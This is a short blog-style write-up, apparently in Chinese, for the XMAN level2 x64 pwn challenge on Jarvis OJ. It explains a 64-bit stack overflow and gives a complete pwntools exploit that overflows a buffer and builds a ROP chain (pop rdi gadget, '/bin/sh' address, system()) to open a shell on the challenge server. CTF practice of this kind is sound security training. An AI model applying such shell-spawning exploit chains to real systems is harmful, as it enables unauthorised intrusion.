[XMAN]level2(x64)

nc pwn2.jarvisoj.com 9882

 



level2_x64.04d700633c6dc26afc6a1e7e9df8c94e

 

64位栈溢出。x64下函数的第一个参数通过rdi寄存器传递,因此返回地址处要先放一个pop rdi的gadget,把"/bin/sh"字符串的地址装入rdi,再返回到system。exp如下:

from pwn import *

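# Exploit script for the level2_x64 challenge: overflows a stack buffer and
# overwrites the saved return address with a short ROP chain.
#
# NOTE(review): every address below is hard-coded, so the script only works
# while the binary is mapped at a fixed base (presumably built without PIE)
# and the overflowed function has no stack canary -- confirm with checksec.
# Enabling either mitigation breaks this exact payload.

# To test against a local copy instead of the service, use:
#   io = process('./level2_x64')
io = remote('pwn2.jarvisoj.com', 9882)

# Addresses taken from the challenge binary (meanings inferred from the
# names; verify against the disassembly):
pop_rdi = 0x4006b3      # presumably a `pop rdi; ret` gadget
system_addr = 0x4004C0  # presumably the PLT entry for system()
binsh_addr = 0x600A90   # presumably a "/bin/sh" string inside the binary

# Bytes of padding written before the saved return address is reached.
# NOTE(review): 136 looks like a 128-byte buffer plus the 8-byte saved rbp --
# confirm against the vulnerable function's stack frame.
padding_len = 136

# Wait for the prompt. A bytes literal is used because pwntools tubes work on
# bytes; passing a str on Python 3 triggers a BytesWarning.
io.recvuntil(b'Input:\n')

# On x86-64 the first argument is passed in rdi, so the chain loads the
# "/bin/sh" address into rdi and then returns into system().
payload = b'a' * padding_len + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)
io.send(payload)

# Hand the connection over to the terminal.
io.interactive()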

 

posted @ 2021-07-17 16:47  hktk1643